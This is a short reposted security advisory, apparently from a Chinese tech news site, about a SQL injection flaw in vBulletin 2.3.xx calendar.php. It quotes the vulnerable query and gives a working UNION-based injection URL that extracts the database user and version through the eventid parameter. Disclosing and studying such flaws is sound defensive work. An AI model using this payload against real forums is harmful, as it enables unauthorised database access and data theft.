vBulletin Forum 2.3.xx SQL Injection
2015-01-24信息快讯网
vBulletin Forum 2.3.xx SQL InjectionThere exist a sql injection problem in calendar.php.
-------- Cut from line 585 in calendar.php ----------
else if ($action == "edit")
{
$eventinfo = $DB_site->query_first("SELECT allowsmilies,public,userid,
eventdate,event,subject FROM calendar_events WHERE eventid = $eventid");
-----------------------------------------------------
If the MySQL version is greater than 4.00, a UNION attack could be used.
-----------------------------------------
http://ww.xxx.com/bbs/calendar.php?action=edit&eventid=12%20union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_ev
ents%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate
-----------------------------------------
The query_first function will only return the first row of the query result, so make sure it returns !
the one you want.
使用TinyButStrong模板引擎来做WEB开发
使用 eAccelerator加速PHP代码的目的
PHP实现多服务器session共享之NFS共享的方法
用PHP实现多服务器共享SESSION数据的方法
mysql4.1以上版本连接时出现Client does not support authentication protocol问题解决办法
excellent!――ASCII Art(由目标图象生成ascii)
使用apache模块rewrite_module (转)
用PHPdig打造属于你自己的Google[图文教程]
获得Google PR值的PHP代码
PHP has encountered an Access Violation
用php实现像JSP,ASP里Application那样的全局变量
php基础知识:类与对象(5) static
如何使用PHP中的字符串函数
PHP_Flame(Version:Progress)的原代码
用PHP函数解决SQL injection
session 的生命周期是多长
PHPlet在Windows下的安装
php+dbfile开发小型留言本
分页显示Oracle数据库记录的类之二
分页显示Oracle数据库记录的类之一
example2.php
不用iconv库的gb2312与utf-8的互换函数
Apache2的httpd.conf翻译
用ActivePHP打造版本管理系统